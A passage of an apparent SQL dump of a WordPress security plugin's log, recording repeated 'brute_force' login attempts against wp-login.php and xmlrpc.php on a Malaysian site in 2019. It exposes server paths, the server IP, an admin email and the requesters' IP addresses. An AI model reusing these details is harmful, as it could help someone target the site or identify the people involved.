18:02:45',17747808,19233520,'https://bintara.com.my/wp-login.php',1,0,'31.14.128.73'),(24211,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"31.14.128.73\";s:11:\"REMOTE_PORT\";s:5:\"49577\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-ORGShanGhHYaqyCSjKAAAAAg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568656965.1376\";s:12:\"REQUEST_TIME\";s:10:\"1568656965\";}}','notice','2019-09-16 18:02:47','2019-09-16 18:02:45',17910568,19233520,'https://bintara.com.my/wp-login.php',1,0,'31.14.128.73'),(24212,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"195.161.114.244\";s:11:\"REMOTE_PORT\";s:5:\"34340\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-PDWkPXSyJlCUJQmoc4gAAAZU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568657165.8828\";s:12:\"REQUEST_TIME\";s:10:\"1568657165\";}}','notice','2019-09-16 18:06:07','2019-09-16 18:06:06',17717008,19207968,'https://bintara.com.my/wp-login.php',1,0,'195.161.114.244'),(24213,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"195.161.114.244\";s:11:\"REMOTE_PORT\";s:5:\"35184\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-PEGShanGhHYaqyCSjqwAAAA0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568657168.7715\";s:12:\"REQUEST_TIME\";s:10:\"1568657168\";}}','notice','2019-09-16 18:06:10','2019-09-16 18:06:09',18236296,19534088,'https://bintara.com.my/xmlrpc.php',1,0,'195.161.114.244'),(24214,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.122.172.69\";s:11:\"REMOTE_PORT\";s:5:\"24495\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-Q@rIp53uPsY7BKAq59QAAAEg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568657658.2672\";s:12:\"REQUEST_TIME\";s:10:\"1568657658\";}}','notice','2019-09-16 18:14:19','2019-09-16 18:14:18',17738448,19228872,'https://bintara.com.my/wp-login.php',1,0,'213.122.172.69'),(24215,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"46.101.143.24\";s:11:\"REMOTE_PORT\";s:5:\"43948\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-UGWkPXSyJlCUJQmoeAAAAAY0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568658458.0494\";s:12:\"REQUEST_TIME\";s:10:\"1568658458\";}}','notice','2019-09-16 18:27:39','2019-09-16 18:27:38',17738048,19229120,'https://bintara.com.my/wp-login.php',1,0,'46.101.143.24'),(24216,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"108.179.219.114\";s:11:\"REMOTE_PORT\";s:5:\"36898\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-UnmShanGhHYaqyCSnIgAAAAg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568658590.6052\";s:12:\"REQUEST_TIME\";s:10:\"1568658590\";}}','notice','2019-09-16 18:29:52','2019-09-16 18:29:50',17740672,19231656,'https://bintara.com.my/wp-login.php',1,0,'108.179.219.114'),(24217,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"108.179.219.114\";s:11:\"REMOTE_PORT\";s:5:\"37728\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-UomShanGhHYaqyCSnIwAAAAw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568658594.1389\";s:12:\"REQUEST_TIME\";s:10:\"1568658594\";}}','notice','2019-09-16 18:29:55','2019-09-16 18:29:54',18259816,19555888,'https://bintara.com.my/xmlrpc.php',1,0,'108.179.219.114'),(24218,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"188.165.233.82\";s:11:\"REMOTE_PORT\";s:5:\"39204\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-WYNK-omY048@iBsMQ3wAAAME\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568659040.3387\";s:12:\"REQUEST_TIME\";s:10:\"1568659040\";}}','notice','2019-09-16 18:37:21','2019-09-16 18:37:20',17740672,19231584,'https://bintara.com.my/wp-login.php',1,0,'188.165.233.82'),(24219,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"188.165.233.82\";s:11:\"REMOTE_PORT\";s:5:\"39596\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-WY2kPXSyJlCUJQmoe5wAAAZE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568659043.1142\";s:12:\"REQUEST_TIME\";s:10:\"1568659043\";}}','notice','2019-09-16 18:37:24','2019-09-16 